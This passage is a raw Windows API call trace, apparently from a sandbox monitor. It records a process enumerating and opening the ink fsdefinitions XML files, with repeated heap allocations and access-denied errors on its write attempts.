ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0099.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0099.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.324] AreFileApisANSI () returned 1 [0099.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpUsedDefaultChar=0x0) returned 88 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0099.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.325] AreFileApisANSI () returned 1 [0099.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0099.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0099.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x819d0, cchWideChar=88 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 88 [0099.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.325] GetFileType (hFile=0x27c) returned 0x1 [0099.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0099.325] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.325] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.325] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.326] CloseHandle (hObject=0x27c) returned 1 [0099.326] AreFileApisANSI () returned 1 [0099.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0099.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81e20 [0099.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x81e20, cchWideChar=88 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 88 [0099.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.326] GetLastError () returned 0x5 [0099.326] GetLastError () returned 0x5 [0099.326] SetLastError (dwErrCode=0x5) [0099.326] GetLastError () returned 0x5 [0099.326] SetLastError (dwErrCode=0x5) [0099.326] GetLastError () returned 0x5 [0099.326] SetLastError (dwErrCode=0x5) [0099.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81e20 | out: hHeap=0x20000) returned 1 [0099.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0099.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.326] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0099.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.327] AreFileApisANSI () returned 1 [0099.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpUsedDefaultChar=0x0) returned 85 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0099.328] AreFileApisANSI () returned 1 [0099.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0099.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x811e8 [0099.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x811e8, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 85 [0099.328] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.329] GetFileType (hFile=0x27c) returned 0x1 [0099.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0099.329] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.329] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.329] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.329] CloseHandle (hObject=0x27c) returned 1 [0099.329] AreFileApisANSI () returned 1 [0099.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x812a0 [0099.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x812a0, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 85 [0099.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.330] GetLastError () returned 0x5 [0099.330] GetLastError () returned 0x5 [0099.330] SetLastError (dwErrCode=0x5) [0099.330] GetLastError () returned 0x5 [0099.330] SetLastError (dwErrCode=0x5) [0099.330] GetLastError () returned 0x5 [0099.330] SetLastError (dwErrCode=0x5) [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.330] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdc9, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0099.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0099.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0099.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.331] AreFileApisANSI () returned 1 [0099.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpUsedDefaultChar=0x0) returned 82 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0099.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.331] AreFileApisANSI () returned 1 [0099.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f2c8 [0099.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 82 [0099.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.332] GetFileType (hFile=0x27c) returned 0x1 [0099.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.332] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.332] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.332] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.332] CloseHandle (hObject=0x27c) returned 1 [0099.332] AreFileApisANSI () returned 1 [0099.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f9a8 [0099.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x5f9a8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 82 [0099.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.333] GetLastError () returned 0x5 [0099.333] GetLastError () returned 0x5 [0099.333] SetLastError (dwErrCode=0x5) [0099.333] GetLastError () returned 0x5 [0099.333] SetLastError (dwErrCode=0x5) [0099.333] GetLastError () returned 0x5 [0099.333] SetLastError (dwErrCode=0x5) [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0099.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 